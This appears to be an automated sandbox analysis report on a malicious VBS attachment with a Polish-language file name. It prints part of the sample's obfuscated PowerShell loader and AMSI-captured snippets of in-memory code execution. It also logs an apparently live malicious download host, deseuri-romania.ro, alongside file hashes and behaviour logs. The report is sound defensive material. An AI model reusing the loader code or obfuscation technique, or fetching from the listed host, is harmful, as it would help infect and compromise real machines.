Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Yara match	File source: 00000006.00000002.2673783211.00000000097DB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2673637961.0000000008380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2659683449.000000000569C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Triclinium)$GLOBAl:pERVAsION = [SysTeM.TEXT.eNCODIng]::Ascii.GetSTRING($tragikErE)$GlOBAl:NeWFoUnDlNDErS=$PerVaSIOn.SubStRIng($GROOverhEAd,$QUADRicyCLeR)<#Royals Fjsene Guarantine #>
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Preracing $Vanetnkningernesescabrrestordrens $Forladerne155), (Stereodeck @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bechirp = [AppDomain]::CurrentDom
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nigrosins)), $Grassmen).DefineDynamicModule($Twattler, $false).DefineType($Micros, $Beholdningens, [System.MulticastDelegate])$Scholas
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Triclinium)$GLOBAl:pERVAsION = [SysTeM.TEXT.eNCODIng]::Ascii.GetSTRING($tragikErE)$GlOBAl:NeWFoUnDlNDErS=$PerVaSIOn.SubStRIng($GROOverhEAd,$QUADRicyCLeR)<#Royals Fjsene Guarantine #>

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4439	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5478	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6123	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3639	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: Yara match	File source: amsi64_7608.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Name	IP	Active
s-part-0017.t-0009.fb-t-msedge.net	13.107.253.45	true
deseuri-romania.ro	188.241.183.203	true
Horm5zl_6637.6637.6637.657e	unknown	unknown

ID:	1541193
Product:	CloudBasic
Start time:	15:06:05
Start date:	24.10.2024
Sample:	Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	740d51a6d22d43f1b99e61c9d3366237
SHA1:	712c28e59ff11135e1957f86d8e6a995ad772de6
SHA256:	e301c6308fff6e0e1d3e399a2ad2eb623f2f36590ff60766d16efbe6f4c154dc
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F93358E626551B46E6ED5A0A9D29BD51	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egclhwgb.myd.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huoothud.2hk.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwyz3jwf.her.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy40rhyy.vfi.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Ghastily.Kri	ASCII text, with very long lines (65536), with no line terminators	87CB39DFE342DFF1EAAD4F98568D8AC2	01DECB2CE6352B9BC94819F25C2A2529F4F432F8	250ED83843CA423C4FD9C6BC72B1A975DCDD8CCFD6327F5313B7852F6DD673A4

Windows Analysis Report Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs

Malware Threat Intel
Provided by